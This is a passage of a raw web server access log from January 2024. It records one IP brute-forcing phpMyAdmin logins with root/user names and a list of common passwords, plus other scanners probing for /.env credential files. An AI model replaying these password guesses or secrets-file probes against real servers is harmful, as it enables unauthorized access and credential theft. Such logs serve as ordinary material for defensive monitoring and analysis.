10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:56 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=enter HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:56 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=qqqqqq HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:56 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=nascar HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:56 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=col123456 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:56 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=qazxsw HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:56 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=techsupport HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:57 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=parker HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:57 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=murphy HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:57 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=webadmin HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:57 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=snowball HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:57 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=walter HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:58 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=master HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:58 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=gordon HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:58 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=database HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:58 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=minecraft HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:58 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=purple HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:58 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=0000 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:59 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=marketing HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:59 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=andrea HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:59 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=freddy HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:59 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=rebecca HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:59 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=dallas HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:21:59 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=315475 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:22:00 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=eth HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:22:00 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=dakota HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:22:00 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=test HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:22:00 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=alexis HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:22:00 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=googledummy HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:22:01 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=thunder HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:22:01 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=coffee HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:22:01 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=121212 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:22:01 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=bear HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:22:01 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=444444 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:22:01 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=p455w0rd HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:22:02 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=252525 HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:22:02 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=root!@ HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:22:02 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=shelby HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 14.133.99.185 - - [04/Jan/2024:08:22:02 -0600] "GET /phpmyadmin/index.php?lang=en&pma_username=user&pma_password=pass HTTP/1.1" 200 4187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"

188.166.160.248 - - [04/Jan/2024:09:17:54 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 OPR/51.0.2830.55" 188.166.160.248 - - [04/Jan/2024:09:17:55 -0600] "\x16\x03\x01\x02" 400 0 "-" "-"

89.187.169.107 - - [04/Jan/2024:11:16:35 -0600] "GET /whyareugay HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/605.1.15" 89.187.169.107 - - [04/Jan/2024:11:16:35 -0600] "GET /.env HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/605.1.15" 89.187.169.107 - - [04/Jan/2024:11:16:35 -0600] "GET /api/.env HTTP/1.1" 404 435 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1"

221.122.67.75 - - [04/Jan/2024:11:28:22 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"

78.153.140.221 - - [04/Jan/2024:11:30:41 -0600] "\x16\x03\x01\x01H\x01" 400 0 "-" "-" 78.153.140.221 - - [04/Jan/2024:11:30:42 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"